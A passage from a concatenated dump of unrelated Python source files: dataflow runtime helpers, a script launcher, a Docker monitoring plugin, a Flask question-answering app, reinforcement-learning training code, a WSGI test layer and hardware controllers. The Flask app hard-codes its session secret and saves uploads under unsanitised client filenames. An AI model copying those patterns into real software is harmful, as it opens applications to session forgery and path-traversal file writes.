"127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
for i in range(_num_py_operators + 1)
]
def runner(node_id, data_addresses, control_addresses):
_internal.run(node_id, data_addresses, control_addresses)
processes = [
mp.Process(target=runner, args=(i, data_addresses, control_addresses))
for i in range(1, _num_py_operators + 1)
]
# Needed to shut down child processes
def sigint_handler(sig, frame):
for p in processes:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
for p in processes:
p.start()
# The driver must always be on node 0 otherwise ingest and extract streams
# will break
py_node_handle = _internal.run_async(0, data_addresses, control_addresses,
graph_filename)
return NodeHandle(py_node_handle, processes)
def add_watermark_callback(read_streams, write_streams, callback):
"""Adds a watermark callback across several read streams.
Args:
read_streams (list of ReadStream): streams on which the callback is
invoked.
write_streams (list of WriteStream): streams on which the callback
can send messages.
callback (timestamp, list of WriteStream -> None): a low watermark
callback.
"""
def internal_watermark_callback(coordinates, is_top):
timestamp = Timestamp(coordinates=coordinates, is_top=is_top)
callback(timestamp, *write_streams)
py_read_streams = [s._py_read_stream for s in read_streams]
_internal.add_watermark_callback(py_read_streams,
internal_watermark_callback)
def _flow_watermark_callback(timestamp, *write_streams):
"""Flows a watermark to all write streams."""
for write_stream in write_streams:
write_stream.send(WatermarkMessage(timestamp))
def profile(event_name, operator, event_data=None):
return Profile(event_name, operator, event_data)
def profile_method(**decorator_kwargs):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if isinstance(args[0], Operator):
# The func is an operator method.
op_name = args[0].config.name
cb_name = func.__name__
if "event_name" in decorator_kwargs:
event_name = decorator_kwargs["event_name"]
else:
# Set the event name to the operator name and the callback
# name if it's not passed by the user.
event_name = op_name + "." + cb_name
timestamp = None
if len(args) > 1:
if isinstance(args[1], Timestamp):
# The func is a watermark callback.
timestamp = args[1]
elif isinstance(args[1], Message):
# The func is a callback.
timestamp = args[1].timestamp
else:
raise TypeError(
"@erdos.profile can only be used on operator methods")
with erdos.profile(event_name,
args[0],
event_data={"timestamp": str(timestamp)}):
func(*args, **kwargs)
return wrapper
return decorator
class NodeHandle(object):
"""Used to shutdown a dataflow created by `run_async`."""
def __init__(self, py_node_handle, processes):
self.py_node_handle = py_node_handle
self.processes = processes
def shutdown(self):
"""Shuts down the dataflow."""
print("shutting down other processes")
for p in self.processes:
p.terminate()
p.join()
print("shutting down node")
self.py_node_handle.shutdown_node()
print("done shutting down")
|
script.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import os
import subprocess
import sys
import threading
from .launcher import Launcher, LauncherStatus
logger = logging.getLogger('vineyard')
class ScriptLauncher(Launcher):
''' Launch the job by executing a script.
The output of script must be printed to stdout, rather than stderr.
'''
def __init__(self, script):
super(ScriptLauncher, self).__init__()
self._script = script
self._proc = None
self._listen_thrd = None
self._cmd = None
def run(self, *args, **kw):
# FIXME run self._script on a set of host machines, the host is decided
# by the arguments of the launcher in `__init__`, and those inputs object
cmd = [self._script]
for arg in args:
if isinstance(arg, str):
cmd.append(arg.encode('unicode-escape').decode('utf-8'))
else:
cmd.append(repr(arg))
env = os.environ.copy()
for key, value in kw.items():
# if key is all in lower cases, treat it as arguments, otherwise as the
# environment variables.
if key.islower():
cmd.append('--%s' % key)
if isinstance(value, str):
cmd.append(value)
else:
cmd.append(repr(value))
else:
env[key] = value
logger.debug('command = %s', ' '.join(cmd))
self._cmd = cmd
self._proc = subprocess.Popen(cmd,
env=env,
universal_newlines=True,
encoding='utf-8',
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._status = LauncherStatus.RUNNING
self._listen_thrd = threading.Thread(target=self.read_output, args=(self._proc.stdout, ))
self._listen_thrd.daemon = True
self._listen_thrd.start()
def wait(self, timeout=None):
# a fast wait: to use existing response directly, since the io adaptor may finish immediately.
r = super(ScriptLauncher, self).wait(timeout=0)
if r is not None:
return r
elapsed, period = 0, 1
while self._proc.poll() is None:
if timeout is not None and elapsed > timeout:
raise TimeoutError('Unable to wait for status of job [%s] after %r seconds' % (self._cmd, timeout))
r = super(ScriptLauncher, self).wait(timeout=period)
elapsed += period
if r is None:
continue
else:
return r
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
remaining = self._proc.stdout.read()
if remaining:
for line in remaining.split('\n'):
self.parse(line)
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
raise RuntimeError('Failed to launch job [%s], exited with %r: %s' % (self._cmd, self._proc.poll(), remaining))
def read_output(self, stream):
while self._proc.poll() is None:
line = stream.readline()
self.parse(line)
logger.debug(line)
# consume all extra lines if the proc exits.
for line in stream.readlines():
self.parse(line)
logger.debug(line)
def join(self):
if self._proc.wait():
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
# makes the listen thread exits.
self._listen_thrd.join()
def dispose(self, desired=True):
if self._status == LauncherStatus.RUNNING:
self._proc.terminate()
if desired:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
return self._status
|
volume-count.py
|
#!/usr/bin/env python
from docker import Client
import BaseHTTPServer
import SocketServer
import datetime
import errno
import json
import os
import signal
import socket
import threading
import time
import urllib2
PLUGIN_ID="volume-count"
PLUGIN_UNIX_SOCK="/var/run/scope/plugins/" + PLUGIN_ID + ".sock"
DOCKER_SOCK="unix://var/run/docker.sock"
nodes = {}
def update_loop():
global nodes
next_call = time.time()
while True:
# Get current timestamp in RFC3339
timestamp = datetime.datetime.utcnow()
timestamp = timestamp.isoformat('T') + 'Z'
# Fetch and convert data to scope data model
new = {}
for container_id, volume_count in container_volume_counts().iteritems():
new["%s;<container>" % (container_id)] = {
'latest': {
'volume_count': {
'timestamp': timestamp,
'value': str(volume_count),
}
}
}
nodes = new
next_call += 5
time.sleep(next_call - time.time())
def start_update_loop():
updateThread = threading.Thread(target=update_loop)
updateThread.daemon = True
updateThread.start()
# List all containers, with the count of their volumes
def container_volume_counts():
containers = {}
cli = Client(base_url=DOCKER_SOCK, version='auto')
for c in cli.containers(all=True):
containers[c['Id']] = len(c['Mounts'])
return containers
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
# The logger requires a client_address, but unix sockets don't have
# one, so we fake it.
self.client_address = "-"
# Generate our json body
body = json.dumps({
'Plugins': [
{
'id': PLUGIN_ID,
'label': 'Volume Counts',
'description': 'Shows how many volumes each container has mounted',
'interfaces': ['reporter'],
'api_version': '1',
}
],
'Container': {
'nodes': nodes,
# Templates tell the UI how to render this field.
'metadata_templates': {
'volume_count': {
# Key where this data can be found.
'id': "volume_count",
# Human-friendly field name
'label': "# Volumes",
# Look up the 'id' in the latest object.
'from': "latest",
# Priorities over 10 are hidden, lower is earlier in the list.
'priority': 0.1,
},
},
},
})
# Send the headers
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', len(body))
self.end_headers()
# Send the body
self.wfile.write(body)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def delete_socket_file():
if os.path.exists(PLUGIN_UNIX_SOCK):
os.remove(PLUGIN_UNIX_SOCK)
def sig_handler(b, a):
delete_socket_file()
exit(0)
def main():
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGINT, sig_handler)
start_update_loop()
# Ensure the socket directory exists
mkdir_p(os.path.dirname(PLUGIN_UNIX_SOCK))
# Remove existing socket in case it was left behind
delete_socket_file()
# Listen for connections on the unix socket
server = SocketServer.UnixStreamServer(PLUGIN_UNIX_SOCK, Handler)
try:
server.serve_forever()
except:
delete_socket_file()
raise
main()
|
app.py
|
import os
import threading
import shutil
from datetime import timedelta, datetime
from flask import Flask, render_template, request, session, jsonify, url_for, redirect
from haystack.document_store.elasticsearch import *
from haystack.preprocessor.utils import convert_files_to_dicts
from haystack.preprocessor.cleaning import clean_wiki_text
from haystack import Finder
from haystack.retriever.sparse import ElasticsearchRetriever
from haystack.reader.transformers import TransformersReader
from elasticsearch import Elasticsearch
es = (
Elasticsearch()
) # Replace with Elasticsearch(["http://elasticsearch:9200/"], verify_certs=True) to build docker image
session_time = 60 # Session Timeout in Minutes
app = Flask(__name__)
app.secret_key = "cbqa_123"
app.permanent_session_lifetime = timedelta(minutes=session_time)
user_id = 0 # User ID to keep track w.r.t sessions and context data
current_users = dict() # Used to store user id with time of login
user_doc_store = dict() # Document store object of the user id
user_settings = dict() # User settings for GPU and Pre-trained models choice
# Handles pre-processing the context and uploads the pre-processed context to Elasticsearch
# Each user is assigned with a separate Elasticsearch index starting with "user_{user_id}"
# Documents & textual context are deleted from them temp folder named with user_id under users dir after uploading to Es
def pre_process(user_id_key):
uploads_dir = "users/" + str(user_id_key) + "/uploads/"
try:
es_result = es.search(
index="user_" + str(user_id_key), body={"query": {"match_all": {}}}
)
no_docs = len(es_result["hits"]["hits"])
except Exception as e:
print(e)
print("\n no documents in es")
processed = convert_files_to_dicts(
dir_path=uploads_dir, clean_func=clean_wiki_text, split_paragraphs=True
)
for doc in range(len(processed)):
try:
# print("\n Checking for duplicate docs ..")
add_doc = True
for each_doc in range(no_docs):
doc_text = es_result["hits"]["hits"][each_doc]["_source"]["text"]
doc_name = es_result["hits"]["hits"][each_doc]["_source"]["name"]
doc_id = es_result["hits"]["hits"][each_doc]["_id"]
if (
processed[doc]["meta"]["name"] == "context_file.txt"
and doc_name == "context_file.txt"
):
# print("Deleting context file to update with new changes ..")
es.delete(
index="user_" + str(user_id_key), doc_type="_doc", id=doc_id
)
if processed[doc]["text"] == doc_text:
# print("\n There is a duplicate, So this document is not added ..")
add_doc = False
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
break
if add_doc:
# print("\n No duplicates found, so adding this to es..")
processed_lst = [processed[doc]]
user_doc_store[user_id_key].write_documents(processed_lst)
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
except Exception as e:
print(e)
# print("\n no documents in es")
processed_lst = [processed[doc]]
user_doc_store[user_id_key].write_documents(processed_lst)
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
# Handles setting up reader and retriever
def set_finder(user_id_key):
if user_settings[user_id_key]["model"] == "roberta":
model_path = (
"deepset/roberta-base-squad2" # Path of the models hosted in Hugging Face
)
elif user_settings[user_id_key]["model"] == "bert":
model_path = "deepset/bert-large-uncased-whole-word-masking-squad2"
elif user_settings[user_id_key]["model"] == "distilbert":
model_path = "distilbert-base-uncased-distilled-squad"
else:
model_path = "illuin/camembert-base-fquad"
retriever = ElasticsearchRetriever(document_store=user_doc_store[user_id_key])
if user_settings[user_id_key]["gpu"] == "on":
try:
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=0
)
except Exception as e:
print(e)
print("GPU not available. Inferencing on CPU")
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=-1
)
else:
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=-1
)
finder = Finder(reader, retriever)
return finder
# Handles deletion of context data completely from the server after the session time ends and deletes user id from dict
def user_session_timer():
global current_users, session_time
seconds_in_day = 24 * 60 * 60
print("\n User tracker thread started @ ", datetime.now())
while True:
for user_id_key in current_users.copy():
current_time = datetime.now()
user_time = current_users[user_id_key]
difference = current_time - user_time
time_diff = divmod(
difference.days * seconds_in_day + difference.seconds, 60
)
if time_diff[0] >= session_time:
try:
del current_users[user_id_key]
del user_doc_store[user_id_key]
del user_settings[user_id_key]
shutil.rmtree("users/" + str(user_id_key))
es.indices.delete(
index="user_" + str(user_id_key), ignore=[400, 404]
)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
# print("\n Deleted user:", user_id_key, " @", datetime.now())
session_timer = threading.Thread(target=user_session_timer)
session_timer.start()
# Handles users w.r.t new session or already in session
@app.route("/")
def home():
global user_id, current_users, session_time
logging.info(
"User connected at "
+ str(datetime.now())
+ " with IP: "
+ str(request.environ["REMOTE_ADDR"])
)
if "user" in session and session["user"] in current_users:
user_id = session["user"]
logged_on = current_users[user_id]
current_time = datetime.now()
diff_min_sec = (
int(datetime.strftime(current_time, "%M"))
- int(datetime.strftime(logged_on, "%M"))
) * 60
diff_sec = int(datetime.strftime(current_time, "%S")) - int(
datetime.strftime(logged_on, "%S")
)
diff_time = diff_min_sec + diff_sec
time_left = (
session_time * 60
) - diff_time # For session timeout on client side
return render_template("index.html", time_left=time_left)
else:
session.permanent = True
current_time = datetime.now()
user_id += 1
current_users[user_id] = current_time
session["user"] = user_id
# print(current_users)
if not os.path.exists("users/"): # Creating user temp dir for uploading context
os.makedirs("users/" + str(user_id))
os.makedirs("users/" + str(user_id) + "/uploads")
else:
os.makedirs("users/" + str(user_id))
os.makedirs("users/" + str(user_id) + "/uploads")
user_doc_store[user_id] = ElasticsearchDocumentStore(
host="localhost", index="user_" + str(user_id)
) # Change host = "elasticsearch" to build docker image
user_settings[user_id] = {
"gpu": "off",
"model": "roberta",
} # Initial user settings
logged_on = current_users[user_id]
current_time = datetime.now()
diff_min_sec = (
int(datetime.strftime(current_time, "%M"))
- int(datetime.strftime(logged_on, "%M"))
) * 60
diff_sec = int(datetime.strftime(current_time, "%S")) - int(
datetime.strftime(logged_on, "%S")
)
diff_time = diff_min_sec + diff_sec
time_left = (
session_time * 60
) - diff_time # For session timeout on client side
return render_template("index.html", time_left=time_left)
# Handles context documents uploads
@app.route("/upload_file", methods=["GET", "POST"])
def upload_file():
global current_users
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
for f in request.files.getlist("file"):
f.save(
os.path.join("users/" + str(user_id_key) + "/uploads", f.filename)
)
pre_process(user_id_key)
return render_template("index.html")
else:
return redirect(url_for("session_timeout"))
else:
return redirect(url_for("session_timeout"))
# Handles context added through the textbox
@app.route("/context", methods=["POST"])
def context():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
text_context = request.form["context"]
context_file = open(
"users/" + str(user_id_key) + "/uploads/context_file.txt", "w"
)
context_file.write(text_context)
context_file.close()
pre_process(user_id_key)
return jsonify({"output": "" + text_context})
else:
return render_template("session_out.html")
else:
return redirect(url_for("session_timeout"))
# Provides extracted answers for the posted question
@app.route("/question", methods=["POST"])
def question():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
query_question = request.form["question"]
es_stats = es.indices.stats(index="user_" + str(user_id_key))
user_index_size = es_stats["_all"]["primaries"]["store"]["size_in_bytes"]
if (
user_index_size == 208
): # To check if index in Es is empty. 208 bytes is default index size without docs
return jsonify({"error": "add context"})
finder = set_finder(user_id_key)
answers_dict = finder.get_answers(
question=query_question, top_k_retriever=5, top_k_reader=5
)
unique_answers = list()
output = list()
if len(answers_dict["answers"]) > 0:
for i in range(len(answers_dict["answers"])):
if (
answers_dict["answers"][i]["answer"] is not None
and answers_dict["answers"][i]["answer"] not in unique_answers
):
temp_dict = answers_dict["answers"][i]
remove = (
"score",
"probability",
"offset_start",
"offset_end",
"document_id",
)
unique_answers.append(temp_dict["answer"])
if temp_dict["meta"]["name"] == "context_file.txt":
temp_dict["meta"]["name"] = "Textual Context"
temp_dict["meta"] = temp_dict["meta"]["name"]
output.append(temp_dict)
for key in remove:
if key in temp_dict:
del temp_dict[key]
else:
output = [
{"answer": "No Answers found ..", "context": " ", "meta": " "},
]
return jsonify({"output": output})
else:
return render_template("session_out.html")
# Handles GPU setting changes.
@app.route("/gpu", methods=["POST"])
def gpu():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
if user_settings[user_id_key]["gpu"] == "on":
user_settings[user_id_key]["gpu"] = "off"
else:
user_settings[user_id_key]["gpu"] = "on"
return jsonify({"output": "gpu status changed"})
# Handles pre-trained model choice setting changes.
@app.route("/models", methods=["POST"])
def models():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
user_settings[user_id_key]["model"] = request.form["model"]
return jsonify({"output": "model changed"})
# Handles session timeout redirection
@app.route("/session_timeout")
def session_timeout():
return render_template("session_out.html")
# Handles removing of session identifier from session dict, This works only when app tab is open until session completes
@app.route("/session_out", methods=["POST"])
def session_out():
session.pop("user", None)
return redirect(url_for("session_timeout"))
# Comment the below block in case of building a docker image or running on WSGI server like gunicorn
if __name__ == "__main__":
app.run(host="0.0.0.0")
|
main.py
|
import torch
from src.data import DataManager
from src.policies import PolicyManagerNew, DeterministicPolicy, GreedyPolicy, AdvSwitchPolicy, RandomPolicy
from src.train import SamplingBuffer, Trainer
from src.envs.breakout import BreakoutWrapper
from src.utils import OptWrapper
import sys
import torch.multiprocessing as mp
import rnnbuilder as rb
run_id = sys.argv[1]
class CONFIG:
FRAME_STACK = 1 # amounts of input steps stacked into one input, put to 1 to disable frame stacking
NUM_ENVS = 16 # number of environments to be run in parallel for data generation, they share one network for parallel evaluation
BATCH_SIZE = 64 # batch size for training only
N_SEQ = 8 # number of elements in a sequence used for training recurrent networks, error signals are only generated for the last element and propagated for this many steps backward
TRAIN_DEVICE = torch.device('cuda') # device used for performing the main training loop
SAMPLING_DEVICE = torch.device('cuda') # where to store the replay buffer, may require significant gpu memory
DATA_DEVICE = torch.device('cuda') # where to run the network for data generation
GAMMA = 0.99 # reward decay parameter from classic q learning
UPDATE_RATE = 5000 # after how many training iterations the target network is updated
BUFFER_CAPACITY = 500000 # capacity of the replay buffer
START_LR = 1e-4 # base learning rate
FINAL_LR = 1e-5 # decay stops here
LR_DECAY = 0.998 # learning rate is multiplied by this factor every UPDATE_RATE iterations
START_TRAINING_AFTER = 50000 # training starts when the replay buffer is filled to this point
RANDOM_UNTIL = 100000 # a random policy is used for the first iterations, see policies below
DATA_MIN = 5 # minimum of data generated per training iteration
DATA_MAX = 10 # maximum of data generated per training iteration
TRANSFER_RATE = 1000 # after how many iterations training and data generation are synced, one process may wait until the above minimum and maximum are satisfied
CREATION_BUFFER = 15005 # buffer size for data generation, should be able to hold an episode of maximum length, needs to fit in shared memory
state_storage_type = torch.float16 # State is converted for storage for saving space
state_type = torch.float32 # This is the recovery type
# Testing parameters for weaker machines to test code
class CONFIG_HOME:
FRAME_STACK = 3
NUM_ENVS = 4
BATCH_SIZE = 32
N_SEQ = 5
TRAIN_DEVICE = torch.device('cuda')
SAMPLING_DEVICE = torch.device('cuda')
DATA_DEVICE = torch.device('cuda')
GAMMA = 0.99
UPDATE_RATE = 500
BUFFER_CAPACITY = 20000#200000
START_LR = 1e-4 # base learning rate
FINAL_LR = 1e-5 # decay stops here
LR_DECAY = 0.998
START_TRAINING_AFTER = 5000
RANDOM_UNTIL = 30000
DATA_MIN = 5
DATA_MAX = 10
TRANSFER_RATE = 500
CREATION_BUFFER = 15005
state_storage_type = torch.float16
state_type = torch.float32
if run_id == 'home':
CONFIG = CONFIG_HOME
EnvClass = BreakoutWrapper# multi-environment class, see /envs/breakout.py
det_pol = DeterministicPolicy()
policies = [ # The set of policies used for data generation
det_pol,
AdvSwitchPolicy(det_pol, DeterministicPolicy(), GreedyPolicy(0.1)), # Switches to a greedy policy later in an episode
GreedyPolicy(0.1),
RandomPolicy()
]
change_list = [ # priority of the above policies over time (played steps)
(0, [0, 0, 0, 1]), # in the beginning only random policy
(CONFIG.RANDOM_UNTIL, [1, 1, 1, 0]) # after that the other 3 policies are equally played
]
CONV_NEURON = rb.nn.ReLU()
conv_stack = rb.Sequential(
rb.rnn.TempConvPlus2d(out_channels=32, kernel_size=8, stride=4, time_kernel_size=CONFIG.FRAME_STACK), CONV_NEURON,
rb.nn.Conv2d(out_channels=64, kernel_size=4, stride=2), CONV_NEURON,
rb.nn.Conv2d(out_channels=64, kernel_size=3, stride=1), CONV_NEURON)
ll_lstm = rb.rnn.LSTM(512)
ll_ffann = rb.Sequential(rb.nn.Linear(512), rb.nn.ReLU())
LAST_LAYER = ll_lstm
factory = rb.Sequential(conv_stack, LAST_LAYER, rb.nn.Linear(EnvClass.n_out))
def make_model():
return factory.make_model(EnvClass.input_shape)
def data_process(comms):
env = EnvClass(CONFIG.NUM_ENVS)
data_net = make_model().to(CONFIG.DATA_DEVICE)
policy_manager = PolicyManagerNew(policies, change_list, f'saves/results/results_{run_id}.json')
dataM = DataManager(policy_manager, env, data_net, comms, CONFIG)
dataM.run()
if __name__ == '__main__':
ctx = mp.get_context('spawn')
data_to_train = ctx.Queue()
train_to_data = ctx.Queue()
condition = ctx.Condition()
comms = {
'data_to_train': data_to_train,
'train_to_data': train_to_data,
'condition': condition
}
dp = ctx.Process(target=data_process, args=(comms,))
dp.start()
train_net = make_model().to(CONFIG.TRAIN_DEVICE)
target_net = make_model().to(CONFIG.TRAIN_DEVICE)
target_net.load_state_dict(train_net.state_dict())
target_net.configure(full_state=True)
criterion = torch.nn.MSELoss()
opt = OptWrapper(train_net.parameters(), CONFIG)
sampling_buffer = SamplingBuffer(EnvClass, train_net.get_initial_state(1), CONFIG)
trainer = Trainer(train_net, target_net, EnvClass, comms, CONFIG.GAMMA, sampling_buffer, opt, criterion)
trainer.run(run_id, CONFIG)
|
__init__.py
|
from wsgiref.simple_server import WSGIRequestHandler
from wsgiref.simple_server import WSGIServer
import os
import plone.testing
import threading
import wsgiref.handlers
class LogWSGIRequestHandler(WSGIRequestHandler):
def log_request(self, *args):
if 'GOCEPT_HTTP_VERBOSE_LOGGING' in os.environ:
WSGIRequestHandler.log_request(self, *args)
class Layer(plone.testing.Layer):
port = 0 # choose automatically
request_handler_class = LogWSGIRequestHandler
def __init__(self, *args, **kw):
super().__init__(*args, **kw)
self.wsgi_app = None
@property
def wsgi_app(self):
return self.get('wsgi_app', self._wsgi_app)
@wsgi_app.setter
def wsgi_app(self, value):
self._wsgi_app = value
@property
def host(self):
return os.environ.get('GOCEPT_HTTP_APP_HOST', 'localhost')
def setUp(self):
self['httpd'] = WSGIServer((self.host, self.port),
self.request_handler_class)
port = self['httpd'].server_port
self['http_host'] = self.host
self['http_port'] = port
self['http_address'] = f'{self.host}:{port}'
self['httpd'].set_app(self.wsgi_app)
self['httpd_thread'] = threading.Thread(target=self.serve)
self['httpd_thread'].daemon = True
self['httpd_thread'].start()
orig_flush = self['_orig_handler_flush'] = (
wsgiref.handlers.SimpleHandler._flush)
def silent_flush(self):
try:
orig_flush(self)
except OSError as e:
if e.args[0] != 32:
raise
wsgiref.handlers.SimpleHandler._flush = silent_flush
def tearDown(self):
self.shutdown()
self['httpd_thread'].join(5)
if self['httpd_thread'].is_alive():
raise RuntimeError('WSGI server could not be shut down')
# make the server really go away and give up the socket
del self['httpd']
del self['httpd_thread']
del self['http_host']
del self['http_port']
del self['http_address']
wsgiref.handlers.SimpleHandler._flush = self['_orig_handler_flush']
del self['_orig_handler_flush']
def serve(self):
self['httpd'].serve_forever()
def shutdown(self):
self['httpd'].shutdown()
self['httpd'].server_close()
class FixupMiddleware:
"""Fix problems between WSGI server and middlewares."""
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
# gocept.httpserverlayer uses wsgiref but
# wsgiref.simple_server.ServerHandler.start_response bails when it
# sees the 'Connection' header, so we remove it here:
def clean_start_response(status, headers, exc_info):
headers = [(k, v) for (k, v) in headers if k != 'Connection']
return start_response(status, headers, exc_info)
return self.app(environ, clean_start_response)
|
led8x8controller.py
|
#!/usr/bin/python3
""" Control the display of an Adafruit 8x8 LED backpack """
# MIT License
#
# Copyright (c) 2019 Dave Wilson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
from threading import Thread
import logging
import logging.config
import led8x8idle
import led8x8flash
import led8x8fibonacci
import led8x8motion
import led8x8wopr
import led8x8life
# Color values as convenient globals.
OFF = 0
GREEN = 1
RED = 2
YELLOW = 3
# state machine modes
IDLE_STATE = 0
DEMO_STATE = 1
SECURITY_STATE = 2
# display modes
FIRE_MODE = 0
PANIC_MODE = 1
FIBONACCI_MODE = 2
WOPR_MODE = 3
LIFE_MODE = 4
logging.config.fileConfig(fname='/home/an/diyclock/logging.ini', disable_existing_loggers=False)
# Get the logger specified in the file
LOGGER = logging.getLogger(__name__)
LOGGER.info('Application started')
class ModeController:
""" control changing modes. note Fire and Panic are externally controlled. """
def __init__(self,):
""" create mode control variables """
self.machine_state = DEMO_STATE
self.current_mode = FIBONACCI_MODE
self.last_mode = LIFE_MODE
self.start_time = time.time()
def set_state(self, state):
""" set the display mode """
self.machine_state = state
def get_state(self,):
""" get the display mode """
return self.machine_state
def set_mode(self, mode):
""" set the display mode """
self.last_mode = self.current_mode
self.current_mode = mode
self.start_time = time.time()
def restore_mode(self,):
""" set or override the display mode """
self.current_mode = self.last_mode
self.start_time = time.time()
def get_mode(self,):
""" get current the display mode """
return self.current_mode
def evaluate(self,):
""" initialize and start the fibinnocci display """
now_time = time.time()
elapsed = now_time - self.start_time
if elapsed > 60:
self.last_mode = self.current_mode
self.current_mode = self.current_mode + 1
self.start_time = now_time
if self.current_mode > LIFE_MODE:
self.current_mode = FIBONACCI_MODE
#pylint: disable=too-many-instance-attributes
class Led8x8Controller:
""" Idle or sleep pattern """
def __init__(self, matrix8x8,):
""" create initial conditions and saving display and I2C lock """
self.matrix8x8 = matrix8x8
self.matrix8x8.clear()
self.mode_controller = ModeController()
self.idle = led8x8idle.Led8x8Idle(self.matrix8x8)
self.fire = led8x8flash.Led8x8Flash(self.matrix8x8, RED)
self.panic = led8x8flash.Led8x8Flash(self.matrix8x8, YELLOW)
self.fib = led8x8fibonacci.Led8x8Fibonacci(self.matrix8x8)
self.motion = led8x8motion.Led8x8Motion(self.matrix8x8)
self.wopr = led8x8wopr.Led8x8Wopr(self.matrix8x8)
self.life = led8x8life.Led8x8Life(self.matrix8x8)
self.error_count = 0
def reset(self,):
""" initialize to starting state and set brightness """
self.mode_controller.set_state(DEMO_STATE)
self.mode_controller.set_mode(FIBONACCI_MODE)
def display_thread(self,):
""" display the series as a 64 bit image with alternating colored pixels """
while True:
try:
mode = self.mode_controller.get_mode()
if mode == FIRE_MODE:
self.fire.display()
elif mode == PANIC_MODE:
self.panic.display()
else:
state = self.mode_controller.get_state()
if state == SECURITY_STATE:
self.motion.display()
elif state == IDLE_STATE:
self.idle.display()
else: #demo
if mode == FIBONACCI_MODE:
self.fib.display()
elif mode == WOPR_MODE:
self.wopr.display()
elif mode == LIFE_MODE:
self.life.display()
self.mode_controller.evaluate()
#pylint: disable=broad-except
except Exception as ex:
LOGGER.info('Led8x8Controller: thread exception: %s %s', str(ex),
str(self.error_count))
self.error_count += 1
if self.error_count < 10:
time.sleep(1.0)
self.matrix8x8.begin()
else:
break
def set_mode(self, mode, override=False):
""" set display mode """
if override:
self.mode_controller.set_mode(mode)
current_mode = self.mode_controller.get_mode()
if current_mode in (FIRE_MODE, PANIC_MODE):
return
self.mode_controller.set_mode(mode)
def restore_mode(self,):
""" return to last mode; usually after idle, fire or panic """
self.mode_controller.restore_mode()
def set_state(self, state):
""" set the machine state """
self.mode_controller.set_state(state)
def get_state(self,):
""" get the current machine state """
return self.mode_controller.get_state()
def update_motion(self, topic):
""" update the countdown timer for the topic (room)"""
self.motion.motion_detected(topic)
def run(self):
""" start the display thread and make it a daemon """
display = Thread(target=self.display_thread)
display.daemon = True
display.start()
if __name__ == '__main__':
sys.exit()
|
bartender.py
|
import gaugette.ssd1306
import gaugette.platform
import gaugette.gpio
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000
OLED_RESET_PIN = 15
OLED_DC_PIN = 16
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/100.0
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrups for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
spi_bus = 0
